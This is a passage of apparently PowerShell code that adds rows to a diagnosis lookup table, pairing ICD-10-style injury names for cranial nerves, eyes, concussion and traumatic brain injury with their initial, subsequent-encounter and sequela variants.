abducent nerve, right side","Injury of abducent nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, right side","Injury of abducent nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, left side","Injury of abducent nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, left side","Injury of abducent nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, left side","Injury of abducent nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, unspecified side","Injury of facial nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, unspecified side","Injury of facial nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, unspecified side","Injury of facial nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, right side","Injury of facial nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, right side","Injury of facial nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, right side","Injury of facial nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, left side","Injury of facial nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, left side","Injury of facial nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of facial nerve, left side","Injury of facial nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, unspecified side","Injury of acoustic nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, unspecified side","Injury of acoustic nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, unspecified side","Injury of acoustic nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, right side","Injury of acoustic nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, right side","Injury of acoustic nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, right side","Injury of acoustic nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, left side","Injury of acoustic nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, left side","Injury of acoustic nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of acoustic nerve, left side","Injury of acoustic nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, unspecified side","Injury of accessory nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, unspecified side","Injury of accessory nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, unspecified side","Injury of accessory nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, right side","Injury of accessory nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, right side","Injury of accessory nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, right side","Injury of accessory nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, left side","Injury of accessory nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, left side","Injury of accessory nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of accessory nerve, left side","Injury of accessory nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, right side","Injury of olfactory [1st ] nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, right side","Injury of olfactory [1st ] nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, right side","Injury of olfactory [1st ] nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, left side","Injury of olfactory [1st ] nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, left side","Injury of olfactory [1st ] nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, left side","Injury of olfactory [1st ] nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, unspecified side","Injury of olfactory [1st ] nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, unspecified side","Injury of olfactory [1st ] nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of olfactory [1st ] nerve, unspecified side","Injury of olfactory [1st ] nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, right side","Injury of other cranial nerves, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, right side","Injury of other cranial nerves, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, right side","Injury of other cranial nerves, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, left side","Injury of other cranial nerves, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, left side","Injury of other cranial nerves, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, left side","Injury of other cranial nerves, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, unspecified side","Injury of other cranial nerves, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, unspecified side","Injury of other cranial nerves, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other cranial nerves, unspecified side","Injury of other cranial nerves, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified cranial nerve","Injury of unspecified cranial nerve, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified cranial nerve","Injury of unspecified cranial nerve, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified cranial nerve","Injury of unspecified cranial nerve, sequela") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye","Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye","Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye","Injury of conjunctiva and corneal abrasion without foreign body, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, right eye","Injury of conjunctiva and corneal abrasion without foreign body, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, right eye","Injury of conjunctiva and corneal abrasion without foreign body, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, right eye","Injury of conjunctiva and corneal abrasion without foreign body, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, left eye","Injury of conjunctiva and corneal abrasion without foreign body, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, left eye","Injury of conjunctiva and corneal abrasion without foreign body, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of conjunctiva and corneal abrasion without foreign body, left eye","Injury of conjunctiva and corneal abrasion without foreign body, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, unspecified eye","Contusion of eyeball and orbital tissues, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, unspecified eye","Contusion of eyeball and orbital tissues, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, unspecified eye","Contusion of eyeball and orbital tissues, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, right eye","Contusion of eyeball and orbital tissues, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, right eye","Contusion of eyeball and orbital tissues, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, right eye","Contusion of eyeball and orbital tissues, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, left eye","Contusion of eyeball and orbital tissues, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, left eye","Contusion of eyeball and orbital tissues, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of eyeball and orbital tissues, left eye","Contusion of eyeball and orbital tissues, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye","Ocular laceration and rupture with prolapse or loss of intraocular tissue, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye","Ocular laceration without prolapse or loss of intraocular tissue, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, right eye","Ocular laceration without prolapse or loss of intraocular tissue, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, right eye","Ocular laceration without prolapse or loss of intraocular tissue, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, right eye","Ocular laceration without prolapse or loss of intraocular tissue, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, left eye","Ocular laceration without prolapse or loss of intraocular tissue, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, left eye","Ocular laceration without prolapse or loss of intraocular tissue, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ocular laceration without prolapse or loss of intraocular tissue, left eye","Ocular laceration without prolapse or loss of intraocular tissue, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, unspecified eye","Penetrating wound of orbit with or without foreign body, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, unspecified eye","Penetrating wound of orbit with or without foreign body, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, unspecified eye","Penetrating wound of orbit with or without foreign body, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, right eye","Penetrating wound of orbit with or without foreign body, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, right eye","Penetrating wound of orbit with or without foreign body, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, right eye","Penetrating wound of orbit with or without foreign body, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, left eye","Penetrating wound of orbit with or without foreign body, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, left eye","Penetrating wound of orbit with or without foreign body, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound of orbit with or without foreign body, left eye","Penetrating wound of orbit with or without foreign body, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of unspecified eyeball","Penetrating wound with foreign body of unspecified eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of unspecified eyeball","Penetrating wound with foreign body of unspecified eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of unspecified eyeball","Penetrating wound with foreign body of unspecified eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of right eyeball","Penetrating wound with foreign body of right eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of right eyeball","Penetrating wound with foreign body of right eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of right eyeball","Penetrating wound with foreign body of right eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of left eyeball","Penetrating wound with foreign body of left eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of left eyeball","Penetrating wound with foreign body of left eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound with foreign body of left eyeball","Penetrating wound with foreign body of left eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of unspecified eyeball","Penetrating wound without foreign body of unspecified eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of unspecified eyeball","Penetrating wound without foreign body of unspecified eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of unspecified eyeball","Penetrating wound without foreign body of unspecified eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of right eyeball","Penetrating wound without foreign body of right eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of right eyeball","Penetrating wound without foreign body of right eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of right eyeball","Penetrating wound without foreign body of right eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of left eyeball","Penetrating wound without foreign body of left eyeball, initial encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of left eyeball","Penetrating wound without foreign body of left eyeball, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Penetrating wound without foreign body of left eyeball","Penetrating wound without foreign body of left eyeball, sequela") + $null = $DiagnosisList.Rows.Add("Avulsion of unspecified eye","Avulsion of unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of unspecified eye","Avulsion of unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of unspecified eye","Avulsion of unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Avulsion of right eye","Avulsion of right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of right eye","Avulsion of right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of right eye","Avulsion of right eye, sequela") + $null = $DiagnosisList.Rows.Add("Avulsion of left eye","Avulsion of left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of left eye","Avulsion of left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of left eye","Avulsion of left eye, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of right eye and orbit","Other injuries of right eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of right eye and orbit","Other injuries of right eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of right eye and orbit","Other injuries of right eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of left eye and orbit","Other injuries of left eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of left eye and orbit","Other injuries of left eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of left eye and orbit","Other injuries of left eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Other injuries of unspecified eye and orbit","Other injuries of unspecified eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of unspecified eye and orbit","Other injuries of unspecified eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injuries of unspecified eye and orbit","Other injuries of unspecified eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified eye and orbit","Unspecified injury of unspecified eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified eye and orbit","Unspecified injury of unspecified eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified eye and orbit","Unspecified injury of unspecified eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right eye and orbit","Unspecified injury of right eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right eye and orbit","Unspecified injury of right eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right eye and orbit","Unspecified injury of right eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left eye and orbit","Unspecified injury of left eye and orbit, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left eye and orbit","Unspecified injury of left eye and orbit, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left eye and orbit","Unspecified injury of left eye and orbit, sequela") + $null = $DiagnosisList.Rows.Add("Concussion without loss of consciousness","Concussion without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion without loss of consciousness","Concussion without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion without loss of consciousness","Concussion without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of 30 minutes or less","Concussion with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of 30 minutes or less","Concussion with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of 30 minutes or less","Concussion with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of unspecified duration","Concussion with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of unspecified duration","Concussion with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Concussion with loss of consciousness of unspecified duration","Concussion with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema without loss of consciousness","Traumatic cerebral edema without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema without loss of consciousness","Traumatic cerebral edema without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema without loss of consciousness","Traumatic cerebral edema without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 30 minutes or less","Traumatic cerebral edema with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 30 minutes or less","Traumatic cerebral edema with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 30 minutes or less","Traumatic cerebral edema with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes","Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes","Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes","Traumatic cerebral edema with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes","Traumatic cerebral edema with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours","Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours","Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours","Traumatic cerebral edema with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic cerebral edema with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic cerebral edema with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Traumatic cerebral edema with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Traumatic cerebral edema with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of unspecified duration","Traumatic cerebral edema with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of unspecified duration","Traumatic cerebral edema with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic cerebral edema with loss of consciousness of unspecified duration","Traumatic cerebral edema with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury without loss of consciousness","Diffuse traumatic brain injury without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury without loss of consciousness","Diffuse traumatic brain injury without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury without loss of consciousness","Diffuse traumatic brain injury without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less","Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less","Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less","Diffuse traumatic brain injury with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Diffuse traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Diffuse traumatic brain injury with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious levels, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Diffuse traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Diffuse traumatic brain injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Diffuse traumatic brain injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of unspecified duration","Diffuse traumatic brain injury with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of unspecified duration","Diffuse traumatic brain injury with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Diffuse traumatic brain injury with loss of consciousness of unspecified duration","Diffuse traumatic brain injury with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury without loss of consciousness","Unspecified focal traumatic brain injury without loss of consciousness, initial encounter") + $null = 